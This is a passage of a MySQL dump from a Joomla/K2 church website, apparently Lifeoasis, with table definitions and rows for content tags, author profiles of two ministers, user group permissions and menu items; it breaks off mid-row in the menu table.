INSERT INTO `y57u5_k2_tags` (`id`, `name`, `published`) VALUES
(19, 'patience', 1),
(20, 'divine', 1),
(21, 'salvation', 1),
(22, 'sensitivity', 1),
(23, 'Holy Spirit', 1),
(24, 'rapture', 1),
(25, 'Correct Christian', 1),
(15, 'lifeoasis', 1),
(16, 'dreamcentre', 1),
(17, 'olusolaareogun', 1),
(18, 'oyenikeareogun', 1),
(26, 'last days', 1),
(27, 'weights', 1),
(28, 'measures', 1),
(29, 'spirit', 1),
(30, 'Pregnant Women', 1),
(31, 'Calling', 1);

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_k2_tags_xref`
--

CREATE TABLE `y57u5_k2_tags_xref` (
  `id` int(11) NOT NULL,
  `tagID` int(11) NOT NULL,
  `itemID` int(11) NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Dumping data for table `y57u5_k2_tags_xref`
--

INSERT INTO `y57u5_k2_tags_xref` (`id`, `tagID`, `itemID`) VALUES
(262, 14, 1),
(261, 13, 1),
(260, 4, 1),
(259, 3, 1),
(258, 2, 1),
(250, 13, 5),
(256, 13, 2),
(255, 11, 2),
(254, 2, 2),
(253, 10, 2),
(252, 9, 2),
(251, 8, 2),
(68, 5, 3),
(69, 4, 3),
(70, 3, 3),
(71, 2, 3),
(72, 1, 3),
(238, 13, 4),
(237, 11, 4),
(236, 10, 4),
(235, 9, 4),
(257, 1, 1),
(249, 16, 5),
(248, 2, 5),
(247, 15, 5),
(246, 13, 6),
(245, 1, 6),
(244, 9, 6),
(243, 2, 6),
(242, 16, 6),
(340, 21, 8),
(280, 20, 7),
(279, 19, 7),
(339, 23, 10),
(338, 22, 10),
(296, 23, 13),
(294, 24, 14),
(300, 25, 19),
(303, 26, 25),
(306, 21, 28),
(312, 28, 31),
(311, 27, 31),
(319, 27, 32),
(323, 29, 33),
(324, 30, 36),
(325, 31, 46),
(341, 31, 47),
(343, 23, 63);

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_k2_users`
--

CREATE TABLE `y57u5_k2_users` (
  `id` int(11) NOT NULL,
  `userID` int(11) NOT NULL,
  `userName` varchar(255) DEFAULT NULL,
  `gender` enum('m','f') NOT NULL DEFAULT 'm',
  `description` text NOT NULL,
  `image` varchar(255) DEFAULT NULL,
  `url` varchar(255) DEFAULT NULL,
  `group` int(11) NOT NULL DEFAULT '0',
  `plugins` text NOT NULL,
  `ip` varchar(15) NOT NULL,
  `hostname` varchar(255) NOT NULL,
  `notes` text NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Dumping data for table `y57u5_k2_users`
--

INSERT INTO `y57u5_k2_users` (`id`, `userID`, `userName`, `gender`, `description`, `image`, `url`, `group`, `plugins`, `ip`, `hostname`, `notes`) VALUES
(1, 42, 'Super User', 'm', '<p>Mauris at lectus ut purus facilisis volutpat. Aliquam nec turpis in nunc venenatis aliquam at ut enim. Etiam sed odio vitae dolor feugiat cursus pulvinar quis nisi. Sed consectetur eleifend tempus. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus vitae dolor feugiat cursus pulvinar quis nisi. Sed consectetur eleifend tempus.</p>', NULL, 'http://www.arrowthemes.com', 1, '', '::1', 'localhost', ''),
(6, 200, 'Rev (Mrs) Oyenike Areogun', 'm', '<p>Rev. Mrs. Oyenike Areogun is an ordained minister of the Gospel. She serves the will of God in this Generation as intercessor, Church Pastor, Pastor’s Wife, Mother, Conference Speaker and Church Administrator. She also operates in a prophetic ministry whose accuracy has brought increase and Joy to God’s people.</p>', '6.png', '', 1, '', '', '', ''),
(7, 199, 'Rev Olusola Ayodele Areogun', 'm', '<p>Rev. Olusola Ayodele Areogun is an ordained minister of the Gospel. He serves the will of God in this generation as Author, Teacher, Church Planter and Mentor of Leaders for the next generation with varied ministerial exposure and experience. He also serves as a father and cover to many up and coming ministries.</p>', '7.png', '', 1, '', '', '', ''),
(8, 196, 'Lifeoasis', 'm', '', '8.png', '', 1, '', '', '', '');

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_k2_user_groups`
--

CREATE TABLE `y57u5_k2_user_groups` (
  `id` int(10) UNSIGNED NOT NULL,
  `name` varchar(255) NOT NULL,
  `permissions` text NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Dumping data for table `y57u5_k2_user_groups`
--

INSERT INTO `y57u5_k2_user_groups` (`id`, `name`, `permissions`) VALUES
(1, 'Registered', '{\"comment\":\"1\",\"frontEdit\":\"0\",\"add\":\"0\",\"editOwn\":\"0\",\"editAll\":\"0\",\"publish\":\"0\",\"inheritance\":0,\"categories\":\"all\"}'),
(2, 'Site Owner', '{\"comment\":\"1\",\"frontEdit\":\"1\",\"add\":\"1\",\"editOwn\":\"1\",\"editAll\":\"1\",\"publish\":\"1\",\"inheritance\":1,\"categories\":\"all\"}');

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_languages`
--

CREATE TABLE `y57u5_languages` (
  `lang_id` int(11) UNSIGNED NOT NULL,
  `asset_id` int(10) UNSIGNED NOT NULL DEFAULT '0',
  `lang_code` char(7) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin NOT NULL,
  `title` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL,
  `title_native` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL,
  `sef` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL,
  `image` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL,
  `description` varchar(512) COLLATE utf8mb4_unicode_ci NOT NULL,
  `metakey` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `metadesc` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `sitename` varchar(1024) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `published` int(11) NOT NULL DEFAULT '0',
  `access` int(10) UNSIGNED NOT NULL DEFAULT '0',
  `ordering` int(11) NOT NULL DEFAULT '0'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

--
-- Dumping data for table `y57u5_languages`
--

INSERT INTO `y57u5_languages` (`lang_id`, `asset_id`, `lang_code`, `title`, `title_native`, `sef`, `image`, `description`, `metakey`, `metadesc`, `sitename`, `published`, `access`, `ordering`) VALUES
(1, 0, 'en-GB', 'English (UK)', 'English (UK)', 'en', 'en', '', '', '', '', 1, 1, 1);

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_menu`
--

CREATE TABLE `y57u5_menu` (
  `id` int(11) NOT NULL,
  `menutype` varchar(24) COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'The type of menu this item belongs to. FK to #__menu_types.menutype',
  `title` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'The display title of the menu item.',
  `alias` varchar(400) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin NOT NULL COMMENT 'The SEF alias of the menu item.',
  `note` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `path` varchar(1024) COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'The computed path of the menu item based on the alias field.',
  `link` varchar(1024) COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'The actually link the menu item refers to.',
  `type` varchar(16) COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'The type of link: Component, URL, Alias, Separator',
  `published` tinyint(4) NOT NULL DEFAULT '0' COMMENT 'The published state of the menu link.',
  `parent_id` int(10) UNSIGNED NOT NULL DEFAULT '1' COMMENT 'The parent menu item in the menu tree.',
  `level` int(10) UNSIGNED NOT NULL DEFAULT '0' COMMENT 'The relative level in the tree.',
  `component_id` int(10) UNSIGNED NOT NULL DEFAULT '0' COMMENT 'FK to #__extensions.id',
  `checked_out` int(10) UNSIGNED NOT NULL DEFAULT '0' COMMENT 'FK to #__users.id',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00' COMMENT 'The time the menu item was checked out.',
  `browserNav` tinyint(4) NOT NULL DEFAULT '0' COMMENT 'The click behaviour of the link.',
  `access` int(10) UNSIGNED DEFAULT NULL,
  `img` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'The image of the menu item.',
  `template_style_id` int(10) UNSIGNED NOT NULL DEFAULT '0',
  `params` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'JSON encoded data for the menu item.',
  `lft` int(11) NOT NULL DEFAULT '0' COMMENT 'Nested set lft.',
  `rgt` int(11) NOT NULL DEFAULT '0' COMMENT 'Nested set rgt.',
  `home` tinyint(3) UNSIGNED NOT NULL DEFAULT '0' COMMENT 'Indicates if this menu item is the home or default page.',
  `language` char(7) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `client_id` tinyint(4) NOT NULL DEFAULT '0'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

--
-- Dumping data for table `y57u5_menu`
--

INSERT INTO `y57u5_menu` (`id`, `menutype`, `title`, `alias`, `note`, `path`, `link`, `type`, `published`, `parent_id`, `level`, `component_id`, `checked_out`, `checked_out_time`, `browserNav`, `access`, `img`, `template_style_id`, `params`, `lft`, `rgt`, `home`, `language`, `client_id`) VALUES
(1, '', 'Menu_Item_Root', 'root', '', '', '', '', 1, 0, 0, 0, 0, '0000-00-00 00:00:00', 0, 0, '', 0, '', 0, 487, 0, '*', 0),
(2, 'quickmenu', 'com_banners', 'Banners', '', 'Banners', 'index.php?option=com_banners', 'component', 0, 1, 1, 4, 0, '0000-00-00 00:00:00', 0, 0, 'class:banners', 0, '', 205, 214, 0, '*', 1),
(3, 'quickmenu', 'com_banners', 'Banners', '', 'Banners/Banners', 'index.php?option=com_banners', 'component', 0, 2, 2, 4, 0, '0000-00-00 00:00:00', 0, 0, 'class:banners', 0, '', 206, 207, 0, '*', 1),
(4, 'quickmenu', 'com_banners_categories', 'Categories', '', 'Banners/Categories', 'index.php?option=com_categories&extension=com_banners', 'component', 0, 2, 2, 6, 0, '0000-00-00 00:00:00', 0, 0, 'class:banners-cat', 0, '', 208, 209, 0, '*', 1),
(5, 'quickmenu', 'com_banners_clients', 'Clients', '', 'Banners/Clients', 'index.php?option=com_banners&view=clients', 'component', 0, 2, 2, 4, 0, '0000-00-00 00:00:00', 0, 0, 'class:banners-clients', 0, '', 210, 211, 0, '*', 1),
(6, 'quickmenu', 'com_banners_tracks', 'Tracks', '', 'Banners/Tracks', 'index.php?option=com_banners&view=tracks', 'component', 0, 2, 2, 4, 0, '0000-00-00 00:00:00', 0, 0, 'class:banners-tracks', 0, '', 212, 213, 0, '*', 1),
(7, 'quickmenu', 'com_contact', 'Contacts', '', 'Contacts', 'index.php?option=com_contact', 'component', 0, 1, 1, 8, 0, '0000-00-00 00:00:00', 0, 0, 'class:contact', 0, '', 217, 222, 0, '*', 1),
(8, 'quickmenu', 'com_contact_contacts', 'Contacts', '', 'Contacts/Contacts', 'index.php?option=com_contact', 'component', 0, 7, 2, 8, 0, '0000-00-00 00:00:00', 0, 0, 'class:contact', 0, '', 218, 219, 0, '*', 1),
(9, 'quickmenu', 'com_contact_categories', 'Categories', '', 'Contacts/Categories', 'index.php?option=com_categories&extension=com_contact', 'component', 0, 7, 2, 6, 0, '0000-00-00 00:00:00', 0, 0, 'class:contact-cat', 0, '', 220, 221, 0, '*', 1),
(10, 'quickmenu', 'com_messages', 'Messaging', '', 'Messaging', 'index.php?option=com_messages', 'component', 0, 1, 1, 15, 0, '0000-00-00 00:00:00', 0, 0, 'class:messages', 0, '', 223, 226, 0, '*', 1),
(11, 'quickmenu', 'com_messages_add', 'New Private Message', '', 'Messaging/New Private Message', 'index.php?option=com_messages&task=message.add', 'component', 0, 10, 2, 15, 0, '0000-00-00 00:00:00', 0, 0, 'class:messages-add', 0, '', 224, 225, 0, '*', 1),
(13, 'quickmenu', 'com_newsfeeds', 'News Feeds', '', 'News Feeds', 'index.php?option=com_newsfeeds', 'component', 0, 1, 1, 17, 0, '0000-00-00 00:00:00', 0, 0, 'class:newsfeeds', 0, '', 227, 232, 0, '*', 1),
(14, 'quickmenu', 'com_newsfeeds_feeds', 'Feeds', '', 'News Feeds/Feeds', 'index.php?option=com_newsfeeds', 'component', 0, 13, 2, 17, 0, '0000-00-00 00:00:00', 0, 0, 'class:newsfeeds', 0, '', 228, 229, 0, '*', 1),
(15, 'quickmenu', 'com_newsfeeds_categories', 'Categories', '', 'News Feeds/Categories', 'index.php?option=com_categories&extension=com_newsfeeds', 'component', 0, 13, 2, 6, 0, '0000-00-00 00:00:00', 0, 0, 'class:newsfeeds-cat', 0, '', 230, 231, 0, '*', 1),
(16, 'quickmenu', 'com_redirect', 'Redirect', '', 'Redirect', 'index.php?option=com_redirect', 'component', 0, 1, 1, 24, 0, '0000-00-00 00:00:00', 0, 0, 'class:redirect', 0, '', 235, 236, 0, '*', 1),
(17, 'quickmenu', 'com_search', 'Search', '', 'Search', 'index.php?option=com_search', 'component', 0, 1, 1, 19, 0, '0000-00-00 00:00:00', 0, 0, 'class:search', 0, '', 233, 234, 0, '*', 1),
(21, 'quickmenu', 'com_finder', 'Smart Search', '', 'Smart Search', 'index.php?option=com_finder', 'component', 0, 1, 1, 27, 0, '0000-00-00 00:00:00', 0, 0, 'class:finder', 0, '', 215, 216, 0, '*', 1),
(23, 'main', 'com_tags', 'Tags', '', 'Tags', 'index.php?option=com_tags', 'component', 1, 1, 1, 29, 0, '0000-00-00 00:00:00', 0, 1, 'class:tags', 0, '', 203, 204, 0, '', 1),
(101, 'mainmenu', 'Home', 'home', '', 'home', 'index.php?option=com_content&view=category&layout=blog&id=29', 'component', 1, 1, 1, 22, 0, '0000-00-00 00:00:00', 0, 1, ' ', 0, '{\"layout_type\":\"blog\",\"show_category_heading_title_text\":\"\",\"show_category_title\":\"1\",\"show_description\":\"\",\"show_description_image\":\"\",\"maxLevel\":\"\",\"show_empty_categories\":\"\",\"show_no_articles\":\"\",\"show_subcat_desc\":\"\",\"show_cat_num_articles\":\"\",\"show_cat_tags\":\"\",\"page_subheading\":\"\",\"num_leading_articles\":\"1\",\"num_intro_articles\":\"2\",\"num_columns\":\"\",\"num_links\":\"\",\"multi_column_order\":\"\",\"show_subcategory_content\":\"\",\"orderby_pri\":\"\",\"orderby_sec\":\"date\",\"order_date\":\"\",\"show_pagination\":\"\",\"show_pagination_results\":\"\",\"show_featured\":\"\",\"show_title\":\"use_article\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"1\",\"link_author\":\"\",\"show_create_date\":\"1\",\"show_modify_date\":\"\",\"show_publish_date\":\"1\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_readmore\":\"\",\"show_readmore_title\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"1\",\"show_tags\":\"\",\"show_noauth\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"0\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 1, 8, 1, '*', 0),
(102, 'mainmenu', 'Media', 'resources', '', 'resources', '', 'separator', 1, 1, 1, 0, 0, '0000-00-00 00:00:00', 0, 1, ' ', 0, '{\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 27, 114, 0, '*', 0),
(103, 'mainmenu', 'Module Layouts', 'module-layouts', '', 'resources/module-layouts', 'index.php?option=com_content&view=article&id=1', 'component', 0, 102, 2, 22, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"0\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"0\",\"link_author\":\"\",\"show_create_date\":\"0\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 98, 99, 0, '*', 0),
(104, 'mainmenu', 'Live Streaming', 'live-streaming', '', 'resources/live-streaming', 'index.php?option=com_content&view=article&id=108', 'component', 1, 102, 2, 22, 196, '2019-08-03 17:55:50', 0, 1, ' ', 0, '{\"show_title\":\"0\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"0\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"0\",\"link_author\":\"\",\"show_create_date\":\"0\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"0\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 28, 29, 0, '*', 0),
(106, 'mainmenu', 'Contact Us', 'contact-us', '', 'contact-us', 'index.php?option=com_content&view=article&id=28', 'component', 1, 1, 1, 22, 0, '0000-00-00 00:00:00', 0, 1, ' ', 0, '{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"0\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 397, 400, 0, '*', 0),
(107, 'mainmenu', 'Joomla', 'joomla', '', 'joomla', 'index.php?option=com_content&view=category&layout=blog&id=22', 'component', -2, 1, 1, 22, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"layout_type\":\"blog\",\"show_category_heading_title_text\":\"\",\"show_category_title\":\"\",\"show_description\":\"\",\"show_description_image\":\"\",\"maxLevel\":\"\",\"show_empty_categories\":\"\",\"show_no_articles\":\"\",\"show_subcat_desc\":\"\",\"show_cat_num_articles\":\"\",\"show_cat_tags\":\"\",\"page_subheading\":\"\",\"num_leading_articles\":\"4\",\"num_intro_articles\":\"2\",\"num_columns\":\"2\",\"num_links\":\"0\",\"multi_column_order\":\"\",\"show_subcategory_content\":\"\",\"orderby_pri\":\"\",\"orderby_sec\":\"rdate\",\"order_date\":\"\",\"show_pagination\":\"\",\"show_pagination_results\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"1\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"1\",\"link_author\":\"1\",\"show_create_date\":\"1\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_readmore\":\"\",\"show_readmore_title\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 179, 198, 0, '*', 0),
(108, 'bottommenu', 'Home', 'bottom-home', '', 'bottom-home', 'index.php?Itemid=', 'alias', 1, 1, 1, 0, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"aliasoptions\":\"101\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1}', 237, 238, 0, '*', 0),
(109, 'bottommenu', 'Live Blog', 'live-blog', '', 'live-blog', 'index.php?Itemid=', 'alias', 1, 1, 1, 0, 0, '0000-00-00 00:00:00', 0, 1, ' ', 0, '{\"aliasoptions\":\"622\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 239, 242, 0, '*', 0),
(111, 'sidebarmenu', 'Sample Levels', 'sample-levels', '', 'sample-levels', '', 'separator', 1, 1, 1, 0, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"menu_image\":\"\",\"menu_text\":1}', 257, 270, 0, '*', 0),
(112, 'sidebarmenu', 'Level 2', 'level-2', '', 'sample-levels/level-2', 'index.php?option=com_content&view=article&id=5', 'component', 1, 111, 2, 22, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}', 258, 259, 0, '*', 0),
(113, 'sidebarmenu', 'Level 2', 'level-21', '', 'sample-levels/level-21', 'index.php?option=com_content&view=article&id=5', 'component', 1, 111, 2, 22, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}', 260, 267, 0, '*', 0),
(114, 'sidebarmenu', 'Level 3', 'level-3', '', 'sample-levels/level-21/level-3', 'index.php?option=com_content&view=article&id=5', 'component', 1, 113, 3, 22, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}', 261, 264, 0, '*', 0),
(115, 'sidebarmenu', 'Level 4', 'level-4', '', 'sample-levels/level-21/level-3/level-4', 'index.php?option=com_content&view=article&id=5', 'component', 1, 114, 4, 22, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}', 262, 263, 0, '*', 0),
(116, 'sidebarmenu', 'Level 2', 'level-22', '', 'sample-levels/level-22', 'index.php?option=com_content&view=article&id=5', 'component', 1, 111, 2, 22, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}', 268, 269, 0, '*', 0),
(117, 'sidebarmenu', 'Accordion A', 'accordion-a', '', 'accordion-a', '', 'separator', 1, 1, 1, 0, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"menu_image\":\"\",\"menu_text\":1}', 271, 278, 0, '*', 0),
(118, 'sidebarmenu', 'Level 2', 'level-2', '', 'accordion-a/level-2', 'index.php?option=com_content&view=article&id=5', 'component', 1, 117, 2, 22, 0, '0000-00-00 00:00:00', 0, 1, '', 0, 